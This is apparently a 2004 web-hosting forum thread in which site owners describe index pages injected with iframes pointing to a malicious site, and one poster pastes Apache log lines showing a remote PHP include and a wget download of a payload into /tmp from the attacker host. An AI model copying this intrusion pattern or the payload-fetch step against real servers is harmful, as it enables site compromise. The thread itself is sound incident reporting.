Results 1 to 4 of 4
  1. #1

    Index pages modified, iframes linking to b00gle.com inserted

    I've been having some security problems, obviously, somehow all index files have been altered by a script, an iframe linking to b00gle.com (a certain page on that site, containing a lot of javascripts, worms, ie exploits, ...) has been inserted so that all visitors viewing the altered files get pop-ups and scripts thrown at them.

    Does anyone have experience dealing with these things? Can anyone shed a light on how those things are done, and how to prevent them?

    If there is a script to automatically remove a certain text (the inserted iframe for example) from all index-files, that would also be appreciated a lot.

    Thanks in advance

  2. #2

    Same thing happened to me

    I have done some google-ing and found a few other people that seemed to have this same problem.

    I have been unsuccessful as of yet in finding the exploit that they used to hak into the system and change the files.

    On the compromised box we are running RH 7.2 with ensim 3.1.0-25

    I know there are also various php scripts running on our server and was wondering if there are any specific exploits that could be used to alter index files for sites....? I have not found any scripts that are common to all the sites hacked.

    Any help would be greatly appreciated.

  3. #3
    Yes, you can do a search and replace. But before that, is that what was done? the code having been inserted into all the pages ?
    Like us on Facebook to qualify for discounts!
    http://www.sprintserve.net
    Offering: | Internap FCP Bandwidth! | Rebootless Kernel Updates! | Magento Optimized Hosting | Wordpress Hosting |
    Services: | Managed Multiple Cores 64bit Servers | Server Management |

  4. #4
    On all index pages, this script added the iframe right after the <body> tag. I saved an 'infected' file, should it be usefull to post here. But there's not much too see but an iframe linking to a certain page on b00gle.

    I found the following things in my apache error log: (url's changed slightly because of problems posting)

    -------------------
    ls: /usr/bin/X11/X: No such file or directory
    [Thu May 20 02:18:15 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/2.inc on line 14


    ls: /usr/bin/X11/X: No such file or directory
    [Thu May 20 17:33:58 2004] [error] PHP Warning: system(): Cannot execute a blank command in b00gleDOTcom/s/2.inc on line 14
    ls: /usr/bin/X11/X: No such file or directory
    --17:34:45-- b00gleDOTcom/cli.gz
    => `/tmp/a.out'
    Resolving b00gleDOTcom... done.
    Connecting to b00gleDOTcom[62.65.252.68]:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 16,902 [text/plain]

    0K .......... ...... 100% 14.96 KB/s

    17:34:48 (14.96 KB/s) - `/tmp/a.out' saved [16902/16902]
    -------------------

    This might be usefull: b00gleDOTcom/s/

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •